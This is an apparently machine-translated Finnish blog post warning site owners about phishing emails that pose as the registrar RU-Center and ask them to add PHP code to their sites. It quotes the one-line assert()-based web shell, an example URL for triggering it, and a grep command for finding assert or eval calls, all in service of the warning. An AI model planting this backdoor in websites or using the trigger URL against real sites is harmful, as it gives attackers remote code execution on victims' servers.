Huomio "verkkovastaavat", jotka eivät tunne PHP: tä. Haavoittuvuus.

Tämä on automaattinen käännös.
Napsauta tätä, jos haluat lukea julkaisun alkuperäisellä kielellä.

Jotkut ystävistäni saivat tänään kirjeitä, joiden väitettiin olevan RU -Centeriltä (suurin venäläinen verkkotunnuksen rekisteröijä) - nic.ru, ja joissa on seuraava sisältö:

Kirjeet lähetettiin osoitteesta info@nic.technical . Kirjeessä hyökkääjät, jotka edustavat itseään RU-Centerin puolesta, ehdottavat seuraavan koodin sijoittamista verkkosivustolle:

 <?php assert(stripslashes($_REQUEST[RUCENTER])); ?>

Valitettavasti monet kollegamme, jotka kutsuvat itseään "webmastereiksi" (lukuisat sivuston omistajat), eivät tunne PHP: tä eivätkä ajattele yllä olevan koodin vaaroja. Jos välität merkkijonon parametriksi tälle toiminnolle, assert () pitää sitä PHP -koodina! Ole varovainen!

Suosittelen, että tarkistat php -projektisi haavoittuvuuksien varalta käyttämällä assert- tai eval -komentoja. Jos nämä komennot ovat läsnä projektikoodissa, älä paniikkia - tutki niiden algoritmia. Algoritmien valtuutettu käyttö on täysin mahdollista. Kun kyseessä on edellä Esimerkiksi komento mahdollistaa hyökkääjän soittaa sivuston, esimerkiksi käyttämällä RUCENTER parametri - http://sistema-audit.ru/?RUCENTER=PHP-code

Suosittelemme, että teet haun käyttämällä esimerkiksi linux -komentoa grep -i -r 'assert' / home / www / mysite / *, joka osoittaa kansion, jossa on sivustotiedostot, jotta saat luettelon tiedostoista, joissa epäilyttävä esimerkki on käytetty koodi.

Pidä huolta itsestäsi ja sivustoistasi!

Tämä on automaattinen käännös.
Napsauta tätä, jos haluat lukea julkaisun alkuperäisellä kielellä.